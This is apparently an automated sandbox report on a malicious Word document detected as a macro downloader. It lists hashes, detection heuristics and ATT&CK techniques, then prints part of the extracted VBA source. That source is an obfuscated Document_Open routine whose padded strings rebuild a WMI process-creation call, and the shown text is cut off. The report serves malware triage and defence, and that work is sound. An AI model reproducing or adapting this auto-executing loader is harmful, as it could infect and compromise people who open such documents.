Office (OLE) malware analysis — malicious · 33f6250cf810bedc

MALICIOUS

Office (OLE)

201.3 KB Created: 2020-08-19 22:16:00 Authoring application: Microsoft Office Word First seen: 2020-09-15

MD5: 4c15d618cf5cdf37caff73a5ffc16f86 SHA-1: e35a8fcdd5ad39e49c32ba44d36edce2ab7cdc91 SHA-256: 33f6250cf810bedca7bbd2cd3cfe0b004e866ce8c52e02012bc83f0e40c14624

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Sagent-9405246-0'. Static analysis revealed the presence of VBA macros, specifically a 'Document_Open' macro that utilizes 'CreateObject' and a hidden UserForm property to execute a command stager. This indicates the document is designed to download and execute a secondary payload upon opening.

Heuristics 7

ClamAV: Doc.Downloader.Sagent-9405246-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Sagent-9405246-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15435 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15435 bytes
SHA-256: `51329823e7f8b13d83aeceda1d86214809174a9434d2e6af77f7d01ca10cd156`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Fx4npncalbauvxk" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub _ Document_open() Hscqgu8qthu6ygds.Q7d8cm642w5 End Sub Attribute VB_Name = "Hscqgu8qthu6ygds" Attribute VB_Base = "0{5AF58D64-1263-462D-9EE2-DC86480F8D51}{F3F38C89-BE0F-46FA-A361-09702AD86517}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function Q7d8cm642w5() Yqh4megq_3xi04hl = "842" If Len("Mhgmed53cnmmz6ivf2Zxl9hfpxmvbcqbw") = Len("Swn6nobj36dl9") + 1 Then End If Len("R5bwmkfk0gzrrgH8lcvt048jvBgnbez98ia61mep") < Len("Ef896iq04jm71bfm") Then MsgBox "Scewfv3tk5kbv2rdm" + "Tny161pi7mchg7s" MsgBox ("Qblbbveovpg8is73nq") MsgBox "Zd_ipg81prdxou" + "Cp4kvgijfqttanrk" End If If Len("Tss6y587f7z9s34nvL_d6i25537y7n9") = Len("G88b3pw8pqlu") Then MsgBox "Qy2fp9bl27k2b" + "Baijs22i78m5_5cyp" MsgBox ("Fshdfsqp87tawk2wu8 !!!") MsgBox "E44wp465w0hi" + "Mmutx0714d6" End If Eo8jjpj7u2sf = Hscqgu8qthu6ygds.HelpContextId + 50 + 50 Ehjkal7pzf_7qsed = "190" If Len("S7m73v7mcxve0Lpb3vqzvrxfi9v") = Len("Tws3l6fw3oxn9") + 1 Then End If Len("Rll2zuqo1uyxfp11txZkacmxwk4kn9cQ3l6sja8n89ezz27") < Len("W_c0yzj0eck") Then MsgBox "Dmwv8typ7ankd9de" + "Y8u9it0_4_dc" MsgBox ("Kg1iiult4fdrg6x461") MsgBox "D1gf2285yvduun_" + "Eu6zu41f3rqczlg9" End If If Len("N9fia_sm1y9zNeghqjabbmaaokk") = Len("Empflcp5ofvmm5f3q") Then MsgBox "Ym8r799hrwfh" + "Ritvlttkrzm4kzyz" MsgBox ("Ejuim99zrrid !!!") MsgBox "Vzgt7e5j5i97ryu" + "Pijtjp8yomkv76bl" End If Un4bptd328izzm5 = ChrW(Eo8jjpj7u2sf + (15)) Pur6dxizxun5a = "725" If Len("Gtrab4i9al8ted7aAojcbkc9hhca21c") = Len("Ihr268aeyug9vtf4wb") + 1 Then End If Len("L2whioc6vf9jvN38pjzenfoseenzcjSoxi2_in4cp02k") < Len("Cc2jommhcwh1djz") Then MsgBox "N8ttgikb8g88" + "Ygyiucl947b" MsgBox ("Evxtkfdd88ch3") MsgBox "W31mhqqgdpuruh" + "F1bsf_xxsxb55e" End If If Len("Dqrfhtiqyw9Mh_4w7zzgb1") = Len("Kheh1gxxbcldaoa") Then MsgBox "Zkn8i_gpt6p9ep7d27" + "Zoa2r0k0p873i7418" MsgBox ("Unpb1z72zswghmfw !!!") MsgBox "M0t890a3txc" + "Bm1_q0sm0zm7" End If Eon55phiam8 = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + Un4bptd328izzm5 + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Hscqgu8qthu6ygds.Dwa66cjerrj + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf" Pwqb0f_m5sd1 = "460" If Len("Fj22o9n9rf8vcmuJlmu_buhr6_rk") = Len("N77e66h0eo1je") + 1 Then End If Len("Or74p_qg3gvgztN07xexaz9r1eoY518dy_0gbk8") < Len("C1uzfy1vp6xa4") Then MsgBox "U9m16c_5m6jw7ju" + "Wmhl80o4urywt_d8k" MsgBox ("Fa5lp5mkozpu") MsgBox "Lbx_k4sx6uugooolm" + "Jl2ct0u9o_wuznayi" End If If Len("Wa5e4smrkfbq0_bCiboszqmptak6hf1g4") = Len("I9itj1cyo80axs") Then MsgBox "H4x6cgvr1jscxd_lj" + "O1a614yqabqq" MsgBox ("J3d8ndm2i3qtj3y !!!") MsgBox "Ppvz7d42qc5gwg" + "Aj3ektgxh9ol0vl" End If Yun7txioicd_y40ed = Fkn1djpvjpknl(Eon55phiam8) Eb_oxeb6ragsfhny = "168" If Len("Ztmlj4n4c2zpr0Od_dxotrzc1r") = Len("Jf0mzp528p9iwwvnmq") + 1 Then End If Len("B_0cikadqbyjumoq94Tcfqyyb ... (truncated)

SHA-256: 51329823e7f8b13d83aeceda1d86214809174a9434d2e6af77f7d01ca10cd156

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Fx4npncalbauvxk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Hscqgu8qthu6ygds.Q7d8cm642w5
End Sub


Attribute VB_Name = "Hscqgu8qthu6ygds"
Attribute VB_Base = "0{5AF58D64-1263-462D-9EE2-DC86480F8D51}{F3F38C89-BE0F-46FA-A361-09702AD86517}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Q7d8cm642w5()
   Yqh4megq_3xi04hl = "842"
If Len("Mhgmed53cnmmz6ivf2Zxl9hfpxmvbcqbw") = Len("Swn6nobj36dl9") + 1 Then End
If Len("R5bwmkfk0gzrrgH8lcvt048jvBgnbez98ia61mep") < Len("Ef896iq04jm71bfm") Then
        MsgBox "Scewfv3tk5kbv2rdm" + "Tny161pi7mchg7s"
        MsgBox ("Qblbbveovpg8is73nq")
        MsgBox "Zd_ipg81prdxou" + "Cp4kvgijfqttanrk"
End If
If Len("Tss6y587f7z9s34nvL_d6i25537y7n9") = Len("G88b3pw8pqlu") Then
       MsgBox "Qy2fp9bl27k2b" + "Baijs22i78m5_5cyp"
       MsgBox ("Fshdfsqp87tawk2wu8 !!!")
       MsgBox "E44wp465w0hi" + "Mmutx0714d6"
End If

Eo8jjpj7u2sf = Hscqgu8qthu6ygds.HelpContextId + 50 + 50
   Ehjkal7pzf_7qsed = "190"
If Len("S7m73v7mcxve0Lpb3vqzvrxfi9v") = Len("Tws3l6fw3oxn9") + 1 Then End
If Len("Rll2zuqo1uyxfp11txZkacmxwk4kn9cQ3l6sja8n89ezz27") < Len("W_c0yzj0eck") Then
        MsgBox "Dmwv8typ7ankd9de" + "Y8u9it0_4_dc"
        MsgBox ("Kg1iiult4fdrg6x461")
        MsgBox "D1gf2285yvduun_" + "Eu6zu41f3rqczlg9"
End If
If Len("N9fia_sm1y9zNeghqjabbmaaokk") = Len("Empflcp5ofvmm5f3q") Then
       MsgBox "Ym8r799hrwfh" + "Ritvlttkrzm4kzyz"
       MsgBox ("Ejuim99zrrid !!!")
       MsgBox "Vzgt7e5j5i97ryu" + "Pijtjp8yomkv76bl"
End If

Un4bptd328izzm5 = ChrW(Eo8jjpj7u2sf + (15))
   Pur6dxizxun5a = "725"
If Len("Gtrab4i9al8ted7aAojcbkc9hhca21c") = Len("Ihr268aeyug9vtf4wb") + 1 Then End
If Len("L2whioc6vf9jvN38pjzenfoseenzcjSoxi2_in4cp02k") < Len("Cc2jommhcwh1djz") Then
        MsgBox "N8ttgikb8g88" + "Ygyiucl947b"
        MsgBox ("Evxtkfdd88ch3")
        MsgBox "W31mhqqgdpuruh" + "F1bsf_xxsxb55e"
End If
If Len("Dqrfhtiqyw9Mh_4w7zzgb1") = Len("Kheh1gxxbcldaoa") Then
       MsgBox "Zkn8i_gpt6p9ep7d27" + "Zoa2r0k0p873i7418"
       MsgBox ("Unpb1z72zswghmfw !!!")
       MsgBox "M0t890a3txc" + "Bm1_q0sm0zm7"
End If

Eon55phiam8 = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + Un4bptd328izzm5 + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Hscqgu8qthu6ygds.Dwa66cjerrj + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
   Pwqb0f_m5sd1 = "460"
If Len("Fj22o9n9rf8vcmuJlmu_buhr6_rk") = Len("N77e66h0eo1je") + 1 Then End
If Len("Or74p_qg3gvgztN07xexaz9r1eoY518dy_0gbk8") < Len("C1uzfy1vp6xa4") Then
        MsgBox "U9m16c_5m6jw7ju" + "Wmhl80o4urywt_d8k"
        MsgBox ("Fa5lp5mkozpu")
        MsgBox "Lbx_k4sx6uugooolm" + "Jl2ct0u9o_wuznayi"
End If
If Len("Wa5e4smrkfbq0_bCiboszqmptak6hf1g4") = Len("I9itj1cyo80axs") Then
       MsgBox "H4x6cgvr1jscxd_lj" + "O1a614yqabqq"
       MsgBox ("J3d8ndm2i3qtj3y !!!")
       MsgBox "Ppvz7d42qc5gwg" + "Aj3ektgxh9ol0vl"
End If

Yun7txioicd_y40ed = Fkn1djpvjpknl(Eon55phiam8)
   Eb_oxeb6ragsfhny = "168"
If Len("Ztmlj4n4c2zpr0Od_dxotrzc1r") = Len("Jf0mzp528p9iwwvnmq") + 1 Then End
If Len("B_0cikadqbyjumoq94Tcfqyyb
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.